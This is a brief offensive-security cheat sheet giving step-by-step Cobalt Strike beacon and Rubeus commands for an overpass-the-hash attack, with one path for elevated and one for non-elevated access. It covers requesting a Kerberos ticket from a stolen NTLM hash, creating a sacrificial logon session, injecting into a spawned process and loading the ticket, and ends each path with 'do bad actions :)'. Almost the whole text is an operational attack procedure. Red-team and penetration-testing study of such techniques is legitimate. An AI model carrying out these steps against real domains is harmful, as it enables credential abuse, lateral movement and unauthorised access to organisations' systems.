overpass_the_hash_with_rubeus-beacon_-_h
OVERPASS THE HASH WITH RUBEUS-BEACON - H
IF ELEVATED:
grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
inject the .kirbi
beacon> kerberos_ticket_use /home/user/ticket.kirbi
do bad actions :)
revert- clears out the sacrificial logon session, so the original context's tickets are restored to normal
beacon> rev2self
IF NOT ELEVATED
grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
Create a sacrificial process. We have to do this due to the way beacon handles tokens now. You can't create a process with a token as a low prived user.
beacon> run C:\Windows\System32\upnpcont.exe
inject into the newly spawned process
beacon> inject x64
inject the .kirbi
new beacon> kerberos_ticket_use /home/user/ticket.kirbi
do bad actions :)
kill the runas beacon when actions are completed
revert in the original beacon-
beacon> rev2self
Last updated
Was this helpful?